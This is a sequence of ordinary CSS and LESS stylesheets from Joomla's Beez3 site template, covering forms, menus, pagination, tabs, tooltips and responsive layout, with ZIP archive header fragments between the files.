}

textarea,.contact-form input[type="text"],.contact-form input[type="email"],.contact-form textarea
	{
	width: 80%;
	-moz-box-sizing: border-box;
	border: 1px solid #DDDDDD;
	color: #333333;
	overflow: auto;
	padding: 5px;
	vertical-align: top;
}

#jform_contact_email_copy-lbl,#jform_contact_email_copy {
	float: left;
	margin-right: 10px;
	border: 0
}

#jform_captcha {
	clear:both;
	padding-bottom:10px;
}

label#jform_captcha-lbl {
	clear: both;
  	position: relative;
  	float: left;
}

.contact-form .button {
	clear: left;
	float: left;
	margin: 20px 0
}

fieldset.filters {
	background: none;
	border: none;
	padding: 0
}

.contact-form,.contact-links,.contact-misc,.contact-image,.contact-contactinfo,.contact-address
	{
	margin: 20px 0
}

/* ++++++++++++++ loginmodule +++++++++++++++++++++++++++ */

#form-login-remember {
	overflow: hidden;
	margin-bottom: 10px
}

#form-login-remember label {
	display: inline;
	margin-left: 10px
}

#modlgn-remember {
	float: left
}

#login-form fieldset {
	background: #f5f5f5
}

#login-form input[type="text"], input[type="password"], input[type="submit"] {
	width: 100%;
	box-sizing: border-box
}

form ul {
	list-style-type: none;
	margin: 0;
	padding: 0
}

/* +++++++++++++++++++++++ pagenav +++++++++++++++++++++++  */
.pagenav {
	text-align: right
}

.pagenav ul {
	display: inline-block;
	*display: inline;
	/* IE7 inline-block hack */
	list-style-type: none;
	margin-left: 0;
	margin-bottom: 0;
}

.pagenav li {
	display: inline;
	margin: 0;
	padding: 0
}

.pagenav a,span.pagenav {
	padding: 0 14px;
	margin: 0;
	text-decoration: none;
	border: 1px solid #ddd;
	border-left: 0 solid #ddd;
	display: inline-block;
	line-height: 1.9em;
}

.pagenav li:first-child a,.pagination-start span {
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
	border-left: solid 1px #ddd
}

.pagenav li:last-child a,.pagination-end span {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}

.pagination ul {
	margin: 10px 10px 10px 0;
	padding: 0
}

.pagination li {
	display: inline;
}

.pagination a {
	padding: 0 14px;
	line-height: 2em;
	text-decoration: none;
	border: 1px solid #ddd;
	border-left: 0 solid #ddd;
	display: inline-block
}

.pagination .active a {
	cursor: default;
}

.pagination span,.pagination span  a:hover {
	cursor: default;
	padding: 0 14px;
	line-height: 2em;
}

.pagination li:first-child a {
	border-left-width: 1px;
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}

.pagination li:last-child a {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}


/* +++++++++++++++++ Breadcrumbs  +++++++++++++++++++++++++++  */

.breadcrumbs,.article-info {
	padding: 7px;
	margin: 0 0 18px;
	list-style: none;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}

.breadcrumbs li {
	display: inline-block;
}

/* +++++++++++++++++ articleinfo /actions  +++++++++++++++++++++++++++  */

ul.actions {
	list-style-type: none;
	text-align: right
}
ul.actions a {padding:0}
ul.actions  li {
	display: inline
}

.article-info-term {
	display: none
}

.article-info {
	overflow: hidden;
	font-size: 0.9em
}

.article-info dd {
	float: left;
	padding: 0 5px;
	border-right: solid 1px #ccc
}

.article-info dd span {
	text-transform: none;
	display: inline-block;
	padding: 0 5px 0 0;
	margin: 0 10px 0 0;
}

.article-info dd.create {
	clear: left
}

/* ######################  header   ###################### */
#fontsize {
	padding: 0;
	margin: 0 20px 0 1px;
	text-align: right;
	margin-bottom: 0;
	float: none;
}

#fontsize h3 {
	padding-right: 0;
	font-weight: normal;
	display: inline;
	font-size: 1em;
	margin: 0
}

#fontsize p {
	margin: 0 0 0 2px;
	padding: 0;
	display: inline;
	font-size: 1em;
}

#fontsize p a {
	margin: 0 2px;
	display: inline;
	padding: 0 5px;
}

/* +++++++++++++++  menus ++++++++++++++++++++++++ */
#header ul.menu {
	padding: 0;
	width: auto;
	text-align: left;
	display: block;
	-webkit-border-radius: 4px 4px 0 0;
	-moz-border-radius: 4px 4px 0 0;
	border-radius: 4px 4px 0 0;
	margin: 0 10px
}

#header ul.menu li {
	display: inline;
	padding: 0;
	margin: 0;
}

#header ul.menu li a:link,#header ul.menu li a:visited,#header ul.menu li:last-child a
	{
	font-weight: bold;
	text-decoration: none;
	margin: 0;
	display: inline-block;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0 0 #f5f5f5;
}

#header ul.menu li:first-child a {
	border-radius: 4px 0 0 0;
	margin-left: -1px
}

.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	padding: 20px;
	margin-bottom: 20px
}

ul.menu {
	margin: 0 0 20px 0;
	padding: 0;
}

ul.menu,ul.menu ul {
	list-style-type: none;
}

ul.menu a {
	display: block;
	margin: 0;
	text-decoration: none;
	padding: 5px 0;
	border-bottom: solid 1px #ddd;
}

ul.menu li:last-child a {
	border: 0;
	box-shadow: none
}

ul.menu ul {
	margin: 0;
	padding: 0
}

ul.menu ul a {
	padding-left: 20px
}

ul.menu ul ul a {
	padding-left: 30px
}

ul.menu ul ul ul a {
	padding-left: 40px
}

ul.menu ul ul ul ul a {
	padding-left: 45px
}

/* ++++++++++++++  content-module ++++++++++++++ */
.category-module {
	margin: 0;
	padding: 0
}

.category-module li {
	padding: 5px 0 5px 0;
	margin: 0;
	list-style-type: none
}

.category-module li h4 {
	margin-bottom: 0
}

.category-module span {
	display: block;
	font-size: 0.85em;
}

.category-module a span {
	display: inline
}

/* content */
.categories-list  .item-title  a {
	text-decoration: none;
	margin-bottom: 20px
}

.category-desc {
	margin: 20px 0
}

.category-desc img {
	float: left;
	margin: 0 20px 10px 0
}

.categories-list dt,.categories-list dd {
	display: inline
}

ul.latestnews li {
	word-wrap: break-word;
}

/* ++++++++++++++++++++++  Footer +++++++++++++++++++++++++ */
#footer-outer
{font-size:0.8em}
.box {
	text-align: left
}

.box ul {
	list-style-type: none
}

#bottom .newsfeed-item {
	padding: 0;
	margin-bottom: 10px
}

.box .moduletable_menu,.box .moduletable {
	margin: 10px
}

.box3 {
	padding-left: 10px
}

.box h3 {
	font-size: 1.3em
}

#footer {
	font-size: 0.8em
}

/*  ####################   Sliding modules  ################## */
.moduletable_js,.moduletable {
	margin-bottom: 20px;
}

.js_heading,.js_heading {
	position: relative;
	display: block;
	padding: 5px 10px;
	margin: 0;
	font-size: 1.40em;
	border-radius: 3px
}

h3.js_heading a {
	display: block;
	position: absolute;
	right: 0;
	top: 0;
	padding: 5px 5px 0 0;
	text-decoration: none;
	background: none
}

.module_content {
	padding: 10px;
	border: solid 1px #ddd;
	border-top: 0;
	border-radius: 0 0 3px 3px;
	margin-top: -1px
}

.no {
	font-size: 1px;
}

.slide {
	height: auto !important;
}

/*  +++++++++++++++++++++++++++++   Module Tabs / Pagebreak Tabs / Contact Tabs ++++++++++++++++ */
ul.tabs {
	margin: 0;
	padding: 0;
	overflow: hidden
}

dl.tabs dt,dl.tabs dd {
	margin: 0;
	padding: 7px 5px;
}

dl.tabs dt h3 {
	font-size: 1em;
	margin: 0;
	padding: 0
}

dl.tabs dt {
	position: relative;
	z-index: 1
}

ul.tabs li,dl.tabs dt {
	list-style-type: none;
	float: left;
	width: auto;
	padding: 0;
	display: block;
	margin: 0 3px 0 0;
	font-size: 1em;
}

ul.tabs li a:link,ul.tabs li a:visited,dl.tabs dt h3 a:link,dl.tabs dt h3 a:visited
	{
	text-decoration: none;
	padding: 7px 5px;
	margin: 0;
	display: block;
	font-size: 0.9em;
	font-weight: normal;
	border-radius: 5px 5px 0 0;
}

ul.tabs li a.linkopen:link,ul.tabs li a.linkopen:visited,dl.tabs dt.open  h3 a:link,dl.tabs dt.open  h3 a:visited
	{
	font-weight: bold;
}

.tabcontent,div.current {
	padding: 30px 20px;
	margin: -1px 0 0 0;
	border-radius: 0 3px 3px 3px;
	clear: left;
}

div.current {
	position: relative;
	top: -1px
}

.tabcontent:focus {
	outline: none
}

.tabopen {
	display: block;
	margin-bottom: 20px;
	overflow: hidden
}

.tabclosed {
	display: none
}

.tabcontent ul {
	padding: 0
}

.tabcontent ul li {
	list-style-type: none
}

/* ++++++++++++++  image float style ++++++++++++++ */
.img-fulltext-left {
	float:left;
	margin-right: 20px;
	margin-bottom: 20px;
}

.img-intro-left {
	float: left;
	margin-right: 10px;
	margin-bottom: 10px;
}

.img-fulltext-right {
	float: right;
	margin-left: 20px;
	margin-bottom: 20px;
}

.img-intro-right {
	float: right;
	margin-left: 10px;
	margin-bottom: 10px;
}

.img-fulltext-none
{display:block;
	margin:10px 0
}

/* Correction for user profile date of birth calendar image */
#jform_profile_dob_img {
	background: url("../images/system/calendar.png") no-repeat scroll 0 0 transparent;
	cursor: pointer;
	height: 18px;
	margin: 0 3px;
	vertical-align: middle;
	width: 18px;
}
/* Smartsearch Calendar*/
#filter_date1_img,
#filter_date2_img {
	background: rgba(0, 0, 0, 0) url("../images/system/calendar.png") no-repeat scroll 0 0;
	cursor: pointer;
	height: 18px;
	margin-left: 3px;
	vertical-align: middle;
	width: 18px;
}
#search-results {
	clear: both;
}
#finder-filter-window {
	overflow: visible;
}
#searchForm .searchintro {
	padding: 0 0 0 250px;
}
.collapse {
	position: relative;
	height: 0;
	overflow: hidden;
	-webkit-transition: height .35s ease;
	-moz-transition: height .35s ease;
	-o-transition: height .35s ease;
	transition: height .35s ease;
}
.collapse.in {
	height: auto;
}
#finder-search .in.collapse {
	overflow: visible;
}
PK!)�""beez3/css/personal_rtl.cssnu&1i�h1#logo {
	margin-right: 90px;
}

PK!X�/�YYbeez3/css/template.cssnu&1i�/**
 * @author Design & Accessible Team ( Angie Radtke  )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */


body {
    background: #fff;
    color: #000000;
    font-size: 100.1%;
    padding: 0px;
    text-align: center;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

body.contentpane {
	width:auto;
	margin:10px;
	text-align: left;
}

img { border: 0 none; }
PK!y��--beez3/css/turq.lessnu&1i�@basecolor 		: rgb(45,53,62);
@compcolor 		: spin(@basecolor, 180);
@bordercolor    : lighten(@basecolor, 60%);
@bodycolor : #eeeeee;
@contentbackground:#fff;
@textcolor : #555;
@linkcolor 		    : #009999;
@linkcolorhover 	: darken(@linkcolor, 10);
@linkcolorvisited   : darken(@linkcolorhover, 10);
@linkcolorfocus 	: darken(@linkcolorvisited, 10);
@backgroundlogoheader: #009999;
@headermenugradientfrom:#eee;
@headermenugradientto:#ddd;
@uxelmentsgradientfrom: #ffffff;
@uxelmentsgradientto: #dddddd;
@uxelmentshovergradientfrom: #00B9B9;
@uxelmentshovergradientto: #009999;

body {
	background: @bodycolor
}

h3 {
	color: @textcolor
}

h2 a {
	text-decoration: none
}

h2,.moduletable h3, .items-leading h2 {
	border-bottom: solid 1px #ddd;
}

.items-row h2 {
	border-top: solid 1px #ddd;
	border-bottom: solid 1px #ddd;
}

a:link,a:visited {
	color: @linkcolor
}

a:hover,a:active,a:focus {
	background:@linkcolor 	 ;
	color: #FFF;
}

.logoheader {
	background: @backgroundlogoheader;
	color: #FFFFFF;
	min-height: 200px;
}

#all {
	background: @contentbackground;
	color: @textcolor ;
}

#shadow #all {
	box-shadow: 0px 20px 10px #555555
}

#header ul.menu {
  background-color:#ddd;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=@headermenugradientfrom, endColorstr=@headermenugradientto);
  background-image: -khtml-gradient(linear, left top, left bottom, from(@headermenugradientfrom), to(@headermenugradientto));
  background-image: -moz-linear-gradient(top, @headermenugradientfrom, @headermenugradientto);
  background-image: -ms-linear-gradient(top, @headermenugradientfrom, @headermenugradientto);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, @headermenugradientfrom), color-stop(100%, @headermenugradientto));
  background-image: -webkit-linear-gradient(top, @headermenugradientfrom, @headermenugradientto);
  background-image: -o-linear-gradient(top, @headermenugradientfrom, @headermenugradientto);
  background-image: linear-gradient(@headermenugradientfrom, @headermenugradientto);
  border-color: #b2b2b2 #b2b2b2 hsl(114, 0%, 62.5%);

  text-shadow: 0 1px 1px rgba(255, 255, 255, 0.49);
  -webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	border: solid 1px #ddd;
	border: 1px solid #e5e5e5;
	text-transform: uppercase;
}

#header ul.menu a:link,#header ul.menu a:visited {
	color: #333;
	font-weight: bold;
	text-decoration: none;
	padding: 0px 10px;
	margin: 0;
	display: inline-block;
	margin: 0 0 0;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0px 0px #f5f5f5;
}

/*  grey background */
.button,button,p.readmore a,#header input.button,.pagenav a:link,.pagenav a:visited,#advanced-search-toggle,.profile-edit a:link,.profile-edit a:visited,h3.js_heading,.article-info
	{
  background-color:#ddd;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=@uxelmentsgradientfrom, endColorstr=@uxelmentsgradientto);
  background-image: -khtml-gradient(linear, left top, left bottom, from(@uxelmentsgradientfrom), to(@uxelmentsgradientto));
  background-image: -moz-linear-gradient(top, @uxelmentsgradientfrom, @uxelmentsgradientto);
  background-image: -ms-linear-gradient(top, #ffffff, #dddddd);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, @uxelmentsgradientfrom), color-stop(100%, @uxelmentsgradientto));
  background-image: -webkit-linear-gradient(top, @uxelmentsgradientfrom, @uxelmentsgradientto);
  background-image: -o-linear-gradient(top, @uxelmentsgradientfrom, @uxelmentsgradientto);
  background-image: linear-gradient(@uxelmentsgradientfrom, @uxelmentsgradientto);
  border-color: #b2b2b2 #b2b2b2 hsl(114, 0%, 62.5%);

  text-shadow: 0 1px 1px rgba(255, 255, 255, 0.49);
  -webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	color: @linkcolor;
	border: solid 1px #ddd
}
.article-info
{color:@textcolor}
/* +++++++++++++  table display  Categories table, contact etc, ++++++++++++++++++++* */
table {
	border: solid 1px #ddd
}



table th a:link,table th a:visited {
	color: #fff
}

tr.odd,tr.cat-list-row1 {
	background: #f8f8f8
}

table  tr:hover td {
	background: #FEFDE2;
}

/* blue background */
.button:hover,
.button:active,
.button:focus,
button:hover,
p.readmore a:hover,
#header ul.menu a:hover,
#header ul.menu a:active,
#header ul.menu a:focus,
.pagenav a:hover,
.pagenav a:active,
.pagenav a:focus,
#advanced-search-toggle:hover,
#advanced-search-toggle:active,
#advanced-search-toggle:focus,
.profile-edit a:hover,
.profile-edit a:active,
.profile-edit a:focus,
#fontsize a:hover,#fontsize a:active,#fontsize a:focus,
#mobile_select h2 a,table th,.logoheader
	{

  background-color:@uxelmentshovergradientfrom;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=@uxelmentshovergradientfrom, endColorstr=@uxelmentshovergradientto);
  background-image: -khtml-gradient(linear, left top, left bottom, from(@uxelmentshovergradientfrom), to(@uxelmentshovergradientto));
  background-image: -moz-linear-gradient(top,@uxelmentshovergradientfrom, @uxelmentshovergradientto);
  background-image: -ms-linear-gradient(top, @uxelmentshovergradientfrom, @uxelmentshovergradientto);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, @uxelmentshovergradientfrom), color-stop(100%, @uxelmentshovergradientto));
  background-image: -webkit-linear-gradient(top, @uxelmentshovergradientfrom, @uxelmentshovergradientto);
  background-image: -o-linear-gradient(top, @uxelmentshovergradientfrom, @uxelmentshovergradientto);
  background-image: linear-gradient(@uxelmentshovergradientfrom, @uxelmentshovergradientto);
  border-color: @uxelmentshovergradientto;
  color: #fff ;
  text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.33);
  -webkit-font-smoothing: antialiased;



}
input:focus,textarea:focus {
	box-shadow: 0 1px 1px  @headermenugradientto inset, 0 0 8px @uxelmentshovergradientfrom;
	outline: 0 none;
}
/* +++++++++++++++++  Pagination +++++++++++++++ */
.pagination span,.pagination span  a:hover {
	color: #999999;
	background-color: #f5f5f5;
}

/* active item */

span.pagenav {
	background: @uxelmentshovergradientto;
	color: #fff;
}

.pagination-start span.pagenav,.pagination-prev  span.pagenav,.pagination-end span.pagenav,.pagination-next span.pagenav
	{
	background-color: #f5f5f5;
	color: #444;
}

/* +++++++++++++++++  content  +++++++++++++++ */


ul.menu a:link,ul.menu a:visited {
	color: #444;
}

/* ++++++++++++++++++++++  menu ++++++++++++++++++++++++++  */
.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;
}

#header ul.menu {
	border: solid 1px #D5D5D5;
	box-shadow: 0 1px 0 #FFFFFF inset, 0 1px 5px rgba(0, 0, 0, 0.1);
}

#header ul.menu a {
	box-shadow: none;
	border-bottom: 0
}

ul.menu a:hover,ul.menu a:active,ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #FFFFFF, #E6E6E6);
	background-repeat: repeat-x;
  background: url(../images/arrow.png) no-repeat right center;
  color:@linkcolor
}

/* ++++++++++++++++   highlighting active menuitem  +++++++++++++++++++ */
ul.menu li.active a,ul.menu  li.active ul li.active a,ul.menu  li.active ul li.active  ul li.active a,ul.menu  li.active ul li.active  ul li.active ul li.active  a,ul.menu  li.active ul li.active  ul li.active ul li.active ul li.active a
	{
	font-weight: bold;
}

ul.menu  li.active ul li a,ul.menu  li.active ul li.active  ul li a,ul.menu  li.active ul li.active  ul li.active ul li  a,ul.menu  li.active ul li.active  ul li.active ul li.active ul li a
	{
	font-weight: normal
}

ul.menu a {
	box-shadow: 0 1px 0 #fff;
	border-bottom: solid 1px #ddd;
	text-shadow: 0 1px 0 #fff
}

ul.menu ul a {
	background: #e5e5e5;
	margin-bottom: 1px
}

ul.menu ul ul ul a {
  background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center;
}

ul.menu ul ul ul ul a {
	background: #fff;
}

/* +++++++++++++++++++++++  SLIDER  ++++++++++++++++++++  */
.panel h3.pane-toggler a {
	background: url(../images/slider_plus.png) right top no-repeat;
	color: #333
}

.panel h3.pane-toggler-down a {
	background: url(../images/slider_minus.png) right top no-repeat;
	border-bottom: solid 1px #ddd;
	color: #333
}

/*  +++++++++++++++++   Tabs ++++++++++++++++++++++  */
ul.tabs li,dl.tabs dt h3 a:link,dl.tabs dt h3 a:visited {
	background: #f5f5f5 url(../images/nature/box.png) repeat-x;
}

ul.tabs li a:link,ul.tabs li a:visited,dl.tabs dt a {
	color: #333;
	border: solid 1px #ddd;
	border-bottom: 0
}

ul.tabs li a:hover,ul.tabs li a:active,ul.tabs li a:focus {
	color: #000
}

.tabcontent,div.current {
	background: #fff;
	color: #000;
	border: solid 1px #ddd;
}

.tabcontent .linkclosed {
	color: #000;
	border-bottom: solid 1px #e5e5e5;
}

ul.tabs li a.linkopen,dl.tabs dt.open  h3 a:link,dl.tabs dt.open  h3 a:visited
	{
	background: #fff;
	color: #333;
	border-radius: 5px 5px 0px 0px;
}

ul.tabs li a.linkclosed:hover,ul.tabs li a.linkclosed:active,ul.tabs li a.linkclosed:focus,ul.tabs li a.linkopen:hover,ul.tabs li a.linkopen:active,ul.tabs li a.linkopen:focus
	{
	background: #555;
	color: #fff
}

#footer-inner,#footer {
	background: #f5f5f5;
	box-shadow: 0px 20px 10px #555
}

#footer {
	background: #555;
	max-width: 1025px;
	margin: 0 auto;
	box-shadow: 0px 0px 10px #555555;
	color: #fff
}

#footer a {
	color: #fff;
	background: none
}

#bottom a {
	background: none
}

.box1 {
	border-right: solid 1px #ccc
}

.box3 {
	border-left: solid 1px #ccc
}

#bottom  ul li a {
	background-image: none;
	padding-left: 0
}

/* responsive */
#mobile_select h2 {border:0; margin:-17px 0 0 0; padding:0; background:@uxelmentshovergradientto;text-align:right}
#mobile_select h2 a {
display:inline-block;
font-size:0.8em;
border-radius:4px 4px 0 0;
padding:6px;
font-size:0.75em;
margin-right:5px;
}

@media only screen and (max-width: 480px) {

	img {
  max-width: 100%;
  height: auto;
  border: 0;
  -ms-interpolation-mode: bicubic;
}

	#fontsize{display:none}
	#nav,#wrapper2,#wrapper,.cols-3 .column-1,.cols-3 .column-2,.cols-3 .column-3,#right,.box,#header form
		{
		float: none;
		width: 100%
	}
	#header {padding-top:3em}
	#header form  {margin:0}
	.logoheader {background:@uxelmentshovergradientto; min-height:100px; margin:0}
	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd;
	}
	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100% ;
		min-width:100%;

		margin: 0 0px; background:@uxelmentshovergradientfrom;
	}
	#header form input {
		float: none; margin-bottom:4px
	}
	#menuwrapper { margin-top:10px; }
	#header ul.menu {position:relative; top:0;left:20px; right:20px; margin:0; width:90%; border-radius:4px}
	#header ul.menu li:first-child a {border-radius: 4px 4px 0 0}
	#header ul.menu li:last-child a {border-radius:0 0 4px 4px }
	#header ul.menu li a:link,

	#header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-bottom: solid 1px #ccc
	}
}

@media only screen and (min-width: 600px) {
}

@media only screen and (min-width: 768px) {
}

@media only screen and (min-width: 992px) {
}

@media only screen and (min-width: 1382px) { /* Styles */
}

@media only screen and (-webkit-min-device-pixel-ratio: 1.5) , only screen and
		(min--moz-device-pixel-ratio: 1.5) , only screen and
	(min-device-pixel-ratio: 1.5) { /* Styles */
}
PK!7�4��)�)beez3/css/general.cssnu&1i�/* not ready */

/* -- form validation */
.invalid { border-color: #B94A48;background:#F2DEDE}
label.invalid , label.required  span{ color: #B94A48; background:none
	}

/* -- Joomla edit buttons  Frontendediting*/
#editor-xtd-buttons {
	padding: 0px;
}
.edit tr:hover  td {background:#eee}
.button2-left,
.button2-right,
.button2-left div,
.button2-right div {
	float: left;
}

.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
	display: block;
	float: left;
	color: #666;
	cursor: pointer;
}

.button2-left span,
.button2-right span {
	cursor: default;
	color: #999;
}

.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
	padding: 0 6px;
}

.page span {
	color: #000;
	font-weight: bold;
}


.button2-left,
.button2-right {

	float: left;
	margin-left: 5px;
}


.edit .formelm-buttons {text-align:right}
.edit .formelm-buttons button {background:#D9EDF7; color:#095197;}
.edit .formelm-buttons button:hover {color:#D9EDF7; background:#095197;}
.modal-button:link,
.modal-button:visited,
.button2-left .readmore a:link,
.button2-left .readmore a:visited,
.button2-left .blank a:link,
.button2-left .blank a:visited
{ background-color: #D9EDF7;

	color:#095197;border:solid 1px #BCE8F1; border-top:0; border-radius:0 0 3px 3px;  text-decoration:none; padding:3px}
.button2-left a:hover,
.button2-left .blank a:hover,
.button2-left .readmore a:hover,
.button2-right a:hover {
	text-decoration: none;
	color: #fff;
	background:#095197;
}
.pull-right {
	float: right;
}
.pull-left {
	float: left;
}
.btn-toolbar .btn {
	-moz-border-bottom-colors: none;
	-moz-border-left-colors: none;
	-moz-border-right-colors: none;
	-moz-border-top-colors: none;
	background-color: #D9EDF7;
	border-image: none;
	border-radius: 0 0 3px 3px;
	color: #095197;
	padding: 3px;
	text-decoration: none;
}

div.toggle-editor {

}
/* Caption fixes */
.img_caption .left {
	float: left;
	margin-right: 1em;
}

.img_caption .right {
	float: right;
	margin-left: 1em;
}

.img_caption .left p {
	clear: left;
	text-align: center;
}

.img_caption .right p {
	clear: right;
	text-align: center;
}

.img_caption  {
	text-align: center!important;
}

.img_caption.none {
	margin-left:auto;
	margin-right:auto;
}
/* New captions */
figure {
	display: table;
}
figure.pull-center,
img.pull-center {
	margin-left: auto;
	margin-right: auto;
}
figcaption {
	display: table-caption;
	caption-side: bottom;
}
/* Calendar */
#jform_publish_down_btn {
	width: 18px;
	height: 18px;
	margin-left: 3px;
	background: url(../images/system/calendar.png) no-repeat;
	cursor: pointer;
	vertical-align: middle;
}
#jform_publish_up_btn {
	width: 18px;
	height: 18px;
	margin-left: 3px;
	background: url(../images/system/calendar.png) no-repeat;
	cursor: pointer;
	vertical-align: middle;
}


/* System Messages */

.error
{
	padding:0px;
	margin-bottom: 20px;
}

.error h2
{
	color:#000 !important;
	font-size:1.4em !important;
	text-transform:uppercase;
	padding:0 0 0 0px !important
}

#system-message dt
{
	font-weight: bold;
}
#system-message dd
{
	margin: 0 0 15px 0;
	font-weight: bold;
	text-indent: 0px;
	padding:0
}
#system-message dd ul
{
	color: #000;
	list-style: none;
	padding: 0px;
}
#system-message dd ul li
{
	line-height:1.5em
}

/* System Standard Messages */
#system-message dt.message
{
	position:absolute;
	top:-2000px;
	left:-3000px;
}

#system-message dd.message  ul
{
	background: #fff  url(../images/system/notice-info.png) no-repeat;
	padding-left:40px;
	padding: 10px 10px 10px 40px;
	border: 2px solid #90B203;
	border-radius:10px
}

#system-message dd.message ul li{background:none !important}

/* System Error Messages */
#system-message dt.error
{
	position:absolute;
	top:-2000px;
	left:-3000px;
}

#system-message dd.error ul
{
	background:#fff url(../images/system/notice-alert.png) no-repeat ;
	padding-left:40px;
 	padding: 10px 10px 10px 40px;
	border: 2px solid #990000;
	border-radius:10px

}



/* System Notice Messages */
#system-message dt.notice
{
	position:absolute;
	top:-2000px;
	left:-3000px;
}

#system-message dd.notice  ul
{
	background:#fff url(../images/system/notice-note.png) no-repeat ;
	padding-left:40px;
	padding: 10px 10px 10px 40px;
	border: 2px solid #FAA528;
	border-radius:10px

}
#system-message dd.notice ul { color: #000;margin:10px 0 }

#system-message
{
	margin-bottom: 0px;
	padding: 0;
}

#system-message dt
{
	font-weight: bold;
}

#system-message dd
{
	font-weight: bold;
	padding: 0;
}


.tip-wrap { background:#FEFDE2; font-size:0.8em ; padding:5px; border:solid 1px #ddd; border-radius:3px; box-shadow: 0 1px 5px #ccc }
.tip-title {font-weight:bold}

#all #upload-flash ul li a:hover,
#all .item a:hover span {
	background:#095197;
	color:#fff;
}


/* ##########################  user profile  ########################### */

#users-profile-core,
#users-profile-custom
{
	margin:10px 0 15px 0;
	padding:15px;
}

#users-profile-core dt,
#users-profile-custom dt
{
	float:left;
	width:12em;
	padding:3px 0;


}

#users-profile-core dd,
#users-profile-custom dd
{
	padding:3px 0;
}

#member-profile fieldset,
.registration fieldset
{
	margin:10px 0 15px 0;
	padding:15px;

}

#users-profile-core legend,
#users-profile-custom legend,
.profile-edit legend,
.registration legend
{
	font-weight:bold
}

.profile-edit form#member-profile fieldset dd,
.registration form#member-registration fieldset dd
{ float:none; padding:5px 0}

.profile-edit form#member-profile fieldset dd input,
.profile-edit form#member-profile fieldset dd select,
.registration form#member-registration fieldset dd input
{width:17em}
.profile-edit form#member-profile fieldset dt,
.registration form#member-registration fieldset dt
{padding:5px 5px 5px 0; width:13em}


span.optional
{font-size:0.9em}

/* ##########################  clearing  ########################### */
.clr {
	clear: both;
	overflow: hidden;
	height: 0;
}

/* ##########################  tooltip  ########################### */
.tooltip {
	position: absolute;
	z-index: 103000;
	display: block;
	visibility: visible;
	font-size: 11px;
	line-height: 1.4;
	opacity: 0;
	filter: alpha(opacity=0);
}
.tooltip.in {
	opacity: 0.8;
	filter: alpha(opacity=80);
}
.tooltip.top {
	margin-top: -3px;
	padding: 5px 0;
}
.tooltip.right {
	margin-left: 3px;
	padding: 0 5px;
}
.tooltip.bottom {
	margin-top: 3px;
	padding: 5px 0;
}
.tooltip.left {
	margin-left: -3px;
	padding: 0 5px;
}
.tooltip-inner {
	max-width: 200px;
	padding: 8px;
	color: #fff;
	text-align: left;
	text-decoration: none;
	background-color: #000;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.tooltip-arrow {
	position: absolute;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
}
.tooltip.top .tooltip-arrow {
	bottom: 0;
	left: 50%;
	margin-left: -5px;
	border-width: 5px 5px 0;
	border-top-color: #000;
}
.tooltip.right .tooltip-arrow {
	top: 50%;
	left: 0;
	margin-top: -5px;
	border-width: 5px 5px 5px 0;
	border-right-color: #000;
}
.tooltip.left .tooltip-arrow {
	top: 50%;
	right: 0;
	margin-top: -5px;
	border-width: 5px 0 5px 5px;
	border-left-color: #000;
}
.tooltip.bottom .tooltip-arrow {
	top: 0;
	left: 50%;
	margin-left: -5px;
	border-width: 0 5px 5px;
	border-bottom-color: #000;
}
.element-invisible {
	position: absolute;
	padding: 0;
	margin: 0;
	border: 0;
	height: 1px;
	width: 1px;
	overflow: hidden;
}
#filter-search {
	vertical-align: top;
}
.input-mini {
	width: 60px;
}

/* ##########################  popover  ########################### */
.popover {
	position: absolute;
	top: 0;
	left: 0;
	z-index: 1010;
	display: none;
	max-width: 276px;
	padding: 1px;
	text-align: left;
	background-color: #fff;
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding;
	background-clip: padding-box;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
